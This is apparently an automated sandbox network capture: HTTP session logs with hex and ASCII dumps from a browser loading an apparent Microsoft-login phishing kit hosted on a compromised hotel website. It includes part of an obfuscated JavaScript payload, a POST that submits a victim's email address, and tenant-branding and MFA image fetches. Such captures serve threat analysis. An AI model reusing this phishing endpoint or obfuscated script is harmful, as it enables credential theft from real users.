                                              Connection: keep-alive
                                              Content-Length: 28
                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                              Accept: */*
                                              Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Origin: null
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:30 UTC925OUTData Raw: 65 6d 3d 6f 72 72 79 61 6e 2e 73 63 68 72 69 76 65 72 25 34 30 76 69 68 61 2e 63 61
                                              Data Ascii: em=orryan.schriver%40viha.ca
                                              2023-09-05 23:45:31 UTC933INHTTP/1.1 200 OK
                                              Date: Tue, 05 Sep 2023 23:45:31 GMT
                                              Server: Apache
                                              X-Powered-By: PHP/7.4.20
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: true
                                              Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS
                                              Set-Cookie: PHPSESSID=ce415bc7ddd5e33daf97805013f17287; path=/
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2023-09-05 23:45:31 UTC933INData Raw: 62 30 0d 0a 7b 22 62 67 5f 69 6d 61 67 65 22 3a 22 22 2c 22 6c 6f 67 6f 5f 69 6d 61 67 65 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 69 6d 61 67 65 73 2e 6e 65 74 5c 2f 64 62 64 35 61 32 64 64 2d 78 36 68 6c 32 34 74 35 75 62 77 78 69 76 64 68 74 36 68 2d 67 6d 6f 66 68 6f 32 66 7a 70 75 31 6e 74 63 66 72 70 6f 64 66 30 65 5c 2f 6c 6f 67 69 6e 74 65 6e 61 6e 74 62 72 61 6e 64 69 6e 67 5c 2f 30 5c 2f 62 61 6e 6e 65 72 6c 6f 67 6f 3f 74 73 3d 36 33 36 39 33 34 37 31 32 38 38 37 34 32 37 30 35 38 22 7d 0d 0a
                                              Data Ascii: b0{"bg_image":"","logo_image":"https:\/\/aadcdn.msauthimages.net\/dbd5a2dd-x6hl24t5ubwxivdht6h-gmofho2fzpu1ntcfrpodf0e\/logintenantbranding\/0\/bannerlogo?ts=636934712887427058"}
                                              2023-09-05 23:45:31 UTC933INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              13192.168.2.44974313.107.213.69443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:30 UTC925OUTGET /shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg HTTP/1.1
                                              Host: aadcdn.msauth.net
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:31 UTC926INHTTP/1.1 200 OK
                                              Cache-Control: public, max-age=31536000
                                              Content-Length: 1173
                                              Content-Type: image/svg+xml
                                              Content-Encoding: gzip
                                              Content-MD5: XHrPYKKsqlxUvysuxtSE2A==
                                              Last-Modified: Fri, 17 Jan 2020 19:28:39 GMT
                                              ETag: 0x8D79B83749623C9
                                              X-Cache: TCP_HIT
                                              x-ms-request-id: 309f99ac-801e-0027-34f4-df774e000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              Access-Control-Allow-Origin: *
                                              X-Azure-Ref-OriginShield: 0WIH3ZAAAAADjNkbcMEZMQpFtNKWHRiIkU0pDRURHRTA1MTcAMzlhMTJmN2UtODk5Zi00NmNmLWE2ZDAtMjRiYmJhMjdkOTU2
                                              X-Azure-Ref: 0mr33ZAAAAABejbocbzRSRY5nXiqj7UobTEFYMzExMDAwMTA4MDMzADM5YTEyZjdlLTg5OWYtNDZjZi1hNmQwLTI0YmJiYTI3ZDk1Ng==
                                              Date: Tue, 05 Sep 2023 23:45:30 GMT
                                              Connection: close
                                              2023-09-05 23:45:31 UTC927INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 56 cb 6e 24 37 0c fc 95 c1 e4 da ad 69 52 d4 2b b0 0d 4c 4e 39 ac 6f 41 0e b9 35 b2 b3 1e 03 8e bd b3 6e 78 f6 f3 53 14 a5 de 6c dc 86 dd 25 5b d4 83 2a 16 29 dd bc be 3d ec be ff f3 f4 fc 7a bb 3f 2f cb d7 5f 0f 87 eb f5 ea ae de bd 7c 7b 38 f0 34 4d 07 8c d8 ef ae 8f 9f 97 f3 ed 5e f2 7e 77 3e 3d 3e 9c 17 fb fb ed f1 74 fd ed e5 fb ed 7e da 4d 3b c9 f8 dd df dd 2c 8f cb d3 e9 6e 7e 7d 3d 2d af 37 07 fb ef e6 db e9 ef e5 a3 55 be 3c 3e 3d dd ee 9f 5f 9e 4f fb c3 dd cd d7 79 39 ef 3e df ee ef fd e4 84 79 e0 e2 a6 c2 b3 77 52 fc 60 38 e1 87 06 72 9e c5 71 24 f4 fa dc b1 db c8 b3 4b 52 2e ce c7 58 bf cc c9 a5 14 16 57 a4 b8 1c e4 e2 24 67 27 22 e8 20 57 3c cf c5 95 24 83 a1 2d e3 32 95 81 8e 18 12 68 30 34 83 4f 83 17 97 7c
                                              Data Ascii: uVn$7iR+LN9oA5nxSl%[*)=z?/_|{84M^~w>=>t~M;,n~}=-7U<>=_Oy9>ywR`8rq$KR.XW$g'" W<$-2h04O|


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              14192.168.2.44974413.107.213.69443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:30 UTC925OUTGET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1
                                              Host: aadcdn.msauth.net
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:31 UTC928INHTTP/1.1 200 OK
                                              Cache-Control: public, max-age=31536000
                                              Content-Length: 199
                                              Content-Type: image/svg+xml
                                              Content-Encoding: gzip
                                              Content-MD5: Ibdh8rH9N/WH1yIgI7CSdg==
                                              Last-Modified: Fri, 17 Jan 2020 19:28:39 GMT
                                              ETag: 0x8D79B8374CE7F93
                                              X-Cache: TCP_HIT
                                              x-ms-request-id: 225aacd2-001e-0057-3ff4-df854e000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              Access-Control-Allow-Origin: *
                                              X-Azure-Ref-OriginShield: 0wB/3ZAAAAADfdj/INXjWTrpnA+wPSbv0U0pDRURHRTA1MTcAMzlhMTJmN2UtODk5Zi00NmNmLWE2ZDAtMjRiYmJhMjdkOTU2
                                              X-Azure-Ref: 0mr33ZAAAAACtqZPHWfXySrIcvB3akytsTEFYMzExMDAwMTA4MDI5ADM5YTEyZjdlLTg5OWYtNDZjZi1hNmQwLTI0YmJiYTI3ZDk1Ng==
                                              Date: Tue, 05 Sep 2023 23:45:30 GMT
                                              Connection: close
                                              2023-09-05 23:45:31 UTC929INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                              Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              15192.168.2.44974513.107.213.69443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:30 UTC926OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1
                                              Host: aadcdn.msauth.net
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:31 UTC929INHTTP/1.1 200 OK
                                              Cache-Control: public, max-age=31536000
                                              Content-Length: 2407
                                              Content-Type: image/svg+xml
                                              Content-Encoding: gzip
                                              Content-MD5: nTculR1Fom7eLci0F6rk+A==
                                              Last-Modified: Fri, 11 Mar 2022 11:11:29 GMT
                                              ETag: 0x8DA034FE445C10D
                                              X-Cache: TCP_HIT
                                              x-ms-request-id: d5221ad4-f01e-0028-22f4-dffe51000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              Access-Control-Allow-Origin: *
                                              X-Azure-Ref-OriginShield: 0WIH3ZAAAAAA+z5/G0MudTIcUlXTW6uPfU0pDRURHRTA1MTAAMzlhMTJmN2UtODk5Zi00NmNmLWE2ZDAtMjRiYmJhMjdkOTU2
                                              X-Azure-Ref: 0mr33ZAAAAABhJGP6XpgJQoug/W1EzefHTEFYMzExMDAwMTA4MDIxADM5YTEyZjdlLTg5OWYtNDZjZi1hNmQwLTI0YmJiYTI3ZDk1Ng==
                                              Date: Tue, 05 Sep 2023 23:45:30 GMT
                                              Connection: close
                                              2023-09-05 23:45:31 UTC930INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                              Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              16192.168.2.449749184.171.250.122443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:32 UTC933OUTGET /host22/7ffe563.php HTTP/1.1
                                              Host: www.grandehotelbraganca.com.br
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: PHPSESSID=da9f1c9bffe96152cbfe03a6e57e6db1
                                              2023-09-05 23:45:32 UTC934INHTTP/1.1 200 OK
                                              Date: Tue, 05 Sep 2023 23:45:33 GMT
                                              Server: Apache
                                              X-Powered-By: PHP/7.4.20
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: true
                                              Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2023-09-05 23:45:32 UTC935INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              17192.168.2.449750152.199.4.73443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:32 UTC934OUTGET /dbd5a2dd-x6hl24t5ubwxivdht6h-gmofho2fzpu1ntcfrpodf0e/logintenantbranding/0/bannerlogo?ts=636934712887427058 HTTP/1.1
                                              Host: aadcdn.msauthimages.net
                                              Connection: keep-alive
                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:32 UTC935INHTTP/1.1 200 OK
                                              Accept-Ranges: bytes
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                              Age: 28136
                                              Cache-Control: public, max-age=86400
                                              Content-MD5: /06VTY+FzPnu5kR+5xjZwQ==
                                              Content-Type: image/*
                                              Date: Tue, 05 Sep 2023 23:45:32 GMT
                                              Etag: 0x8D6D8BF2B2843FF
                                              Last-Modified: Tue, 14 May 2019 22:54:49 GMT
                                              Server: ECAcc (laa/7B06)
                                              X-Cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: 957a4fc6-a01e-002a-7811-e09cf2000000
                                              x-ms-version: 2009-09-19
                                              Content-Length: 7975
                                              Connection: close
                                              2023-09-05 23:45:32 UTC935INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 66 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 06 01 12 00 03 00 00 00 01 00 01 00 00 03 01 00 05 00 00 00 01 00 00 00 56 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                              Data Ascii: JFIFfExifMM*VQQ%Q%CC


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              18192.168.2.449751152.199.4.73443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:33 UTC943OUTGET /dbd5a2dd-x6hl24t5ubwxivdht6h-gmofho2fzpu1ntcfrpodf0e/logintenantbranding/0/bannerlogo?ts=636934712887427058 HTTP/1.1
                                              Host: aadcdn.msauthimages.net
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:33 UTC944INHTTP/1.1 200 OK
                                              Accept-Ranges: bytes
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                              Age: 28137
                                              Cache-Control: public, max-age=86400
                                              Content-MD5: /06VTY+FzPnu5kR+5xjZwQ==
                                              Content-Type: image/*
                                              Date: Tue, 05 Sep 2023 23:45:33 GMT
                                              Etag: 0x8D6D8BF2B2843FF
                                              Last-Modified: Tue, 14 May 2019 22:54:49 GMT
                                              Server: ECAcc (laa/7B06)
                                              X-Cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: 957a4fc6-a01e-002a-7811-e09cf2000000
                                              x-ms-version: 2009-09-19
                                              Content-Length: 7975
                                              Connection: close
                                              2023-09-05 23:45:33 UTC944INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 66 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 06 01 12 00 03 00 00 00 01 00 01 00 00 03 01 00 05 00 00 00 01 00 00 00 56 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                              Data Ascii: JFIFfExifMM*VQQ%Q%CC


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.449728184.171.250.122443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:24 UTC4OUTGET /host22/admin/js/mf.php?id=94Egx7Upb HTTP/1.1
                                              Host: www.grandehotelbraganca.com.br
                                              Connection: keep-alive
                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:24 UTC4INHTTP/1.1 200 OK
                                              Date: Tue, 05 Sep 2023 23:45:25 GMT
                                              Server: Apache
                                              X-Powered-By: PHP/7.4.20
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: true
                                              Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: application/javascript; charset=utf-8
                                              2023-09-05 23:45:24 UTC5INData Raw: 33 64 61 38 0d 0a 69 66 28 74 72 75 65 29 7b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 65 74 5f 6a 77 74 28 29 7b 0d 0a 20 20 76 61 72 20 69 6e 64 65 78 65 73 20 3d 20 27 30 31 32 33 34 35 36 37 38 39 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 27 3b 0d 0a 20 20 76 61 72 20 74 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 44 61 74 65 2e 6e 6f 77 28 29 2f 20 31 30 30 30 29 0d 0a 20 20 63 6f 6e 73 74 20 72 65 20 3d 20 2f 2e 7b 31 2c 36 7d 2f 67 0d 0a 20 20 76 61 72 20 64 61 74 61 20 3d 20 62 74 6f 61 28 74 29 0d 0a 20 20 63 6f 6e 73 74 20 77 6f 72 64 4c 69 73 74 20 3d 20 64 61 74 61 2e 6d 61 74 63 68 28 72 65 29 3b 0d 0a 20 20 63 6f 6e 73 74 20 72 64 65 5f 64 20 3d 20 77 6f 72 64 4c 69 73 74 2e 72 65 76 65 72 73 65 28 29 3b 0d 0a 20
                                              Data Ascii: 3da8if(true){function get_jwt(){ var indexes = '0123456789abcdefghijklmnopqrstuvwxyz'; var t = Math.floor(Date.now()/ 1000) const re = /.{1,6}/g var data = btoa(t) const wordList = data.match(re); const rde_d = wordList.reverse();
                                              2023-09-05 23:45:24 UTC12INData Raw: 79 52 6a 6c 6d 57 44 64 32 65 6c 5a 59 51 30 39 4e 52 6c 68 4d 4d 32 39 68 52 6e 64 4c 62 69 39 53 4e 54 5a 78 4f 54 4e 6e 54 6d 6f 76 59 55 70 47 51 55 5a 47 52 44 4a 45 5a 6b 46 36 65 54 6c 5a 4d 6b 49 35 4d 6b 30 72 5a 57 70 6b 62 47 70 49 5a 56 67 78 62 6d 35 34 52 30 35 74 57 56 68 70 52 48 5a 68 52 44 4d 34 62 6c 5a 4c 56 57 39 70 63 55 6c 76 4e 6d 6c 4f 52 57 39 46 63 46 4a 47 52 56 5a 53 4d 55 56 51 65 57 39 4b 4e 7a 46 4a 64 6e 70 32 64 69 38 76 61 7a 4d 7a 4c 79 39 73 57 43 38 76 4c 32 4a 6b 51 33 49 35 64 6e 52 4b 61 55 70 54 57 57 56 61 5a 6d 59 76 4d 31 5a 6f 55 55 6c 52 61 32 56 78 62 45 74 70 53 6d 52 6c 64 58 46 4f 63 55 64 72 61 46 64 47 57 46 6b 31 5a 30 5a 57 52 44 51 30 63 56 5a 4d 55 6c 46 57 4b 31 68 43 64 46 4e 70 64 58 46 33 54 47
                                              Data Ascii: yRjlmWDd2elZYQ09NRlhMM29hRndLbi9SNTZxOTNnTmovYUpGQUZGRDJEZkF6eTlZMkI5Mk0rZWpkbGpIZVgxbm54R05tWVhpRHZhRDM4blZLVW9pcUlvNmlORW9FcFJGRVZSMUVQeW9KNzFJdnp2di8vazMzLy9sWC8vL2JkQ3I5dnRKaUpTWWVaZmYvM1ZoUUlRa2VxbEtpSmRldXFOcUdraFdGWFk1Z0ZWRDQ0cVZMUlFWK1hCdFNpdXF3TG
                                              2023-09-05 23:45:24 UTC20INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:24 UTC20INData Raw: 31 66 34 30 0d 0a 5a 7a 65 48 4a 50 59 55 59 7a 63 58 49 32 63 30 59 32 4e 6e 52 47 65 6e 4d 78 4d 33 64 51 55 44 42 53 55 6e 70 6c 4e 6a 51 79 5a 6e 4a 44 4d 33 56 4b 56 55 5a 78 64 46 6c 55 4d 6c 59 32 52 47 56 4a 4d 55 56 70 4e 6a 6b 31 57 48 4e 34 5a 56 64 4a 51 56 4a 56 54 56 59 32 64 44 4a 57 63 6c 42 57 55 56 4a 78 52 6d 39 32 57 46 4a 34 4e 48 64 55 63 6c 46 32 54 6d 68 36 64 31 52 53 54 45 74 53 4d 6b 31 53 55 32 68 79 4e 31 70 30 56 43 39 54 62 55 74 76 61 57 6c 4c 4b 32 31 6e 55 6e 46 47 53 56 56 53 56 6b 56 56 5a 46 56 77 55 6b 78 46 64 55 5a 57 53 47 49 32 64 6c 42 59 56 7a 6c 4a 51 33 45 35 56 6b 4e 4f 63 48 59 31 4e 7a 4e 76 56 56 6c 4d 4f 56 42 36 4e 57 74 51 53 56 6b 32 5a 57 73 79 4d 6d 34 7a 62 57 73 34 59 6c 64 7a 52 45 4e 58 54 6a 4e
                                              Data Ascii: 1f40ZzeHJPYUYzcXI2c0Y2NnRGenMxM3dQUDBSUnplNjQyZnJDM3VKVUZxdFlUMlY2RGVJMUVpNjk1WHN4ZVdJQVJVTVY2dDJWclBWUVJxRm92WFJ4NHdUclF2Tmh6d1RSTEtSMk1SU2hyN1p0VC9TbUtvaWlLK21nUnFGSVVSVkVVZFVwUkxFdUZWSGI2dlBYVzlJQ3E5VkNOcHY1NzNvVVlMOVB6NWtQSVk2ZWsyMm4zbWs4YldzRENXTjN
                                              2023-09-05 23:45:24 UTC28INData Raw: 4d 32 4d 33 51 30 70 45 52 30 56 4f 55 33 42 4b 4b 7a 4a 79 52 45 56 7a 5a 46 6c 57 4d 58 70 68 54 30 5a 52 4d 32 49 78 5a 43 39 57 57 54 46 4d 55 58 52 4e 54 55 39 77 4d 6d 64 76 4f 46 67 78 4e 57 56 50 64 45 51 31 4d 7a 4d 76 4c 7a 46 6c 62 6c 6c 48 61 43 38 78 59 33 4a 74 4e 45 31 4f 57 48 6f 35 54 46 52 33 65 6b 55 33 4e 7a 46 75 53 6a 68 6c 57 47 74 53 52 57 56 72 4f 43 74 6f 51 6b 4e 5a 65 48 70 4e 53 31 42 54 51 6b 59 77 53 6b 4a 61 56 44 41 72 62 7a 56 42 53 55 68 73 52 44 46 33 52 47 4a 48 53 53 39 57 5a 30 35 72 53 58 6f 35 52 6d 45 79 51 33 6f 78 61 47 56 42 54 58 4a 31 4f 47 70 55 56 31 52 31 4d 6c 68 7a 62 47 46 73 5a 32 6c 6e 54 46 5a 53 56 7a 49 77 51 56 41 78 57 6e 70 36 65 6d 31 4e 56 54 67 32 4e 6c 46 58 4b 33 52 4e 51 6e 64 78 61 53 39
                                              Data Ascii: M2M3Q0pER0VOU3BKKzJyREVzZFlWMXphT0ZRM2IxZC9WWTFMUXRNTU9wMmdvOFgxNWVPdEQ1MzMvLzFlbllHaC8xY3JtNE1OWHo5TFR3ekU3NzFuSjhlWGtSRWVrOCtoQkNZeHpNS1BTQkYwSkJaVDArbzVBSUhsRDF3RGJHSS9WZ05rSXo5RmEyQ3oxaGVBTXJ1OGpUV1R1MlhzbGFsZ2lnTFZSVzIwQVAxWnp6em1NVTg2NlFXK3RNQndxaS9
                                              2023-09-05 23:45:24 UTC36INData Raw: 0d 0a
                                              Data Ascii:
